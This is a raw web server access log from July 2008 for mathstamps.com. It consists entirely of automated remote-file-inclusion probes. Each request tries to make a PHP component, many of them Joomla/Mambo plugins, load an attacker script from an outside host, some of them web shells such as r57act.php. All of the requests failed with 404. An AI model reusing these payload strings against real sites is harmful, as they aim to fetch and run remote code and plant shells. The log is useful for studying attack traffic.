77.74.196.90 - - [13/Jul/2008:18:40:25 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:18:42:19 -0700] "GET /logs/access_080421.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:18:42:20 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:18:42:20 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:18:42:52 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:18:42:52 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
85.17.200.206 - - [13/Jul/2008:18:45:51 -0700] "GET /logs/access.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
87.106.219.212 - - [13/Jul/2008:18:59:58 -0700] "GET /logs//gallery//update/update5.php?lang=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
87.106.219.212 - - [13/Jul/2008:18:59:58 -0700] "GET //gallery//update/update5.php?lang=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
84.200.32.14 - - [13/Jul/2008:19:00:41 -0700] "GET /logs/access.log/errors.php?error=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.200.32.14 - - [13/Jul/2008:19:00:41 -0700] "GET /errors.php?error=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.200.32.14 - - [13/Jul/2008:19:00:42 -0700] "GET /logs/errors.php?error=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.217.156.81 - - [13/Jul/2008:19:15:12 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://edzzard.deltha-ro.com/r57act.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
8.10.120.85 - - [13/Jul/2008:19:17:16 -0700] "GET /logs/access_080623.log//libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
8.10.120.85 - - [13/Jul/2008:19:17:16 -0700] "GET //libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
8.10.120.85 - - [13/Jul/2008:19:17:16 -0700] "GET /logs//libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:19:17:48 -0700] "GET /logs/access_080623.log//libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:19:17:48 -0700] "GET //libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:19:17:49 -0700] "GET /logs//libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
8.10.120.85 - - [13/Jul/2008:19:17:59 -0700] "GET /logs/access_080616.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
8.10.120.85 - - [13/Jul/2008:19:17:59 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
8.10.120.85 - - [13/Jul/2008:19:17:59 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:19:18:48 -0700] "GET /logs/access_080616.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:19:18:48 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:19:18:49 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
8.10.120.85 - - [13/Jul/2008:19:19:46 -0700] "GET /logs/access_080526.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
8.10.120.85 - - [13/Jul/2008:19:20:35 -0700] "GET /logs/access_080421.log//libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:19:21:23 -0700] "GET /logs/access_080421.log//libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:19:21:26 -0700] "GET /logs/access_080526.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:19:32:25 -0700] "GET /video.php?content=http://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:19:32:25 -0700] "GET /logs/video.php?content=http://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
217.217.156.81 - - [13/Jul/2008:19:41:09 -0700] "GET /index.php?redir=http://edzzard.deltha-ro.com/r57act.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
64.15.155.201 - - [13/Jul/2008:19:49:31 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
64.15.155.201 - - [13/Jul/2008:19:49:32 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:19:55:24 -0700] "GET /logs/access_080616.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:19:55:30 -0700] "GET /logs/access_080616.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:19:55:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:19:55:36 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.98.250.45 - - [13/Jul/2008:19:57:40 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.98.250.45 - - [13/Jul/2008:19:57:40 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.98.250.45 - - [13/Jul/2008:19:57:41 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.98.250.45 - - [13/Jul/2008:19:58:37 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
212.48.153.198 - - [13/Jul/2008:20:03:24 -0700] "GET /logs/access_080623.log//libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.48.153.198 - - [13/Jul/2008:20:03:24 -0700] "GET //libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.48.153.198 - - [13/Jul/2008:20:03:25 -0700] "GET /logs//libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:06:00 -0700] "GET /logs/access_080609.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:06:00 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:06:00 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:06:08 -0700] "GET /logs/access_080505.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
212.48.153.198 - - [13/Jul/2008:20:08:30 -0700] "GET /logs/access_080421.log//libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.24.100.141 - - [13/Jul/2008:20:08:57 -0700] "GET /start.php?mod=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.mathstamps.com"
203.24.100.141 - - [13/Jul/2008:20:08:57 -0700] "GET /logs/start.php?mod=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:20:10:40 -0700] "GET /logs/access_080505.log//errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:20:10:40 -0700] "GET //errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:20:10:41 -0700] "GET /logs//errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:20:10:42 -0700] "GET /logs/access_080512.log//errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:11:56 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.106.45.29 - - [13/Jul/2008:20:12:14 -0700] "GET /logs/access_080505.log//errors.php?error=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.45.29 - - [13/Jul/2008:20:12:14 -0700] "GET //errors.php?error=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.45.29 - - [13/Jul/2008:20:12:14 -0700] "GET /logs//errors.php?error=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.45.29 - - [13/Jul/2008:20:12:19 -0700] "GET /logs/access_080512.log//errors.php?error=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.219.212 - - [13/Jul/2008:20:13:03 -0700] "GET /logs//gallery//update/update5.php?lang=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
87.106.219.212 - - [13/Jul/2008:20:13:03 -0700] "GET //gallery//update/update5.php?lang=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:20:13:38 -0700] "GET //errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:15:09 -0700] "GET /logs/access_080609.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:15:09 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:15:09 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:15:18 -0700] "GET /logs/access_080505.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:20:16:00 -0700] "GET /logs/access_080505.log//include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:20:16:00 -0700] "GET //include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:20:16:01 -0700] "GET /logs//include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.234.133.173 - - [13/Jul/2008:20:16:27 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.234.133.173 - - [13/Jul/2008:20:16:27 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.234.133.173 - - [13/Jul/2008:20:16:27 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:20:17:53 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.215.231.90 - - [13/Jul/2008:20:17:53 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.dutadewata.com/img/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:20:17:58 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:20:18:24 -0700] "GET /logs/access_080519.log//include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.234.133.173 - - [13/Jul/2008:20:18:58 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:20:19:02 -0700] "GET //include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.72.144.162 - - [13/Jul/2008:20:19:34 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.72.144.162 - - [13/Jul/2008:20:19:34 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.72.144.162 - - [13/Jul/2008:20:19:34 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:20:20:15 -0700] "GET /main.php?x=http://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:20:20:15 -0700] "GET /logs/main.php?x=http://www.koral.or.id/components/com_joomlaboard/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
61.47.2.136 - - [13/Jul/2008:20:21:19 -0700] "GET //appserv/main.php?appserv_root=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.47.2.136 - - [13/Jul/2008:20:21:19 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.47.2.136 - - [13/Jul/2008:20:21:19 -0700] "GET /logs/access_080428.log//appserv/main.php?appserv_root=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.47.2.136 - - [13/Jul/2008:20:21:21 -0700] "GET /logs/access_080623.log//appserv/main.php?appserv_root=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.18.81.164 - - [13/Jul/2008:20:21:37 -0700] "GET /logs/access_080616.log//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.18.81.164 - - [13/Jul/2008:20:21:37 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.18.81.164 - - [13/Jul/2008:20:21:37 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [13/Jul/2008:20:21:51 -0700] "GET /logs/access_080616.log//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [13/Jul/2008:20:21:51 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [13/Jul/2008:20:21:52 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.216.2.12 - - [13/Jul/2008:20:28:08 -0700] "GET /logs/access_080602.log//appserv/main.php?appserv_root=http://www.articledirectorysite.com//oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.216.2.12 - - [13/Jul/2008:20:28:08 -0700] "GET //appserv/main.php?appserv_root=http://www.articledirectorysite.com//oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.216.2.12 - - [13/Jul/2008:20:28:08 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.articledirectorysite.com//oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.216.2.12 - - [13/Jul/2008:20:28:14 -0700] "GET /logs/access_080616.log//appserv/main.php?appserv_root=http://www.articledirectorysite.com//oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.84.27.98 - - [13/Jul/2008:20:28:14 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.27.98 - - [13/Jul/2008:20:28:14 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.27.98 - - [13/Jul/2008:20:28:14 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.217.156.81 - - [13/Jul/2008:20:28:17 -0700] "GET /logs/access_080630.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://edzzard.deltha-ro.com/r57act.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
217.217.156.81 - - [13/Jul/2008:20:28:20 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://edzzard.deltha-ro.com/r57act.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
80.231.0.98 - - [13/Jul/2008:20:28:41 -0700] "GET /admin/index.php?site=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
80.231.0.98 - - [13/Jul/2008:20:28:42 -0700] "GET /logs/admin/index.php?site=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
217.20.138.101 - - [13/Jul/2008:20:29:38 -0700] "GET /logs/access_080428.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.138.101 - - [13/Jul/2008:20:29:39 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.138.101 - - [13/Jul/2008:20:29:39 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.18.81.164 - - [13/Jul/2008:20:33:30 -0700] "GET /logs/access_080630.log//rgboard/include/bbs.lib.inc.php?site_path=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.18.81.164 - - [13/Jul/2008:20:33:30 -0700] "GET //rgboard/include/bbs.lib.inc.php?site_path=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.18.81.164 - - [13/Jul/2008:20:33:31 -0700] "GET /logs//rgboard/include/bbs.lib.inc.php?site_path=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
60.50.152.209 - - [13/Jul/2008:20:33:54 -0700] "GET /logs/access_080602.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/pahlawankuruskering/x/ido.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
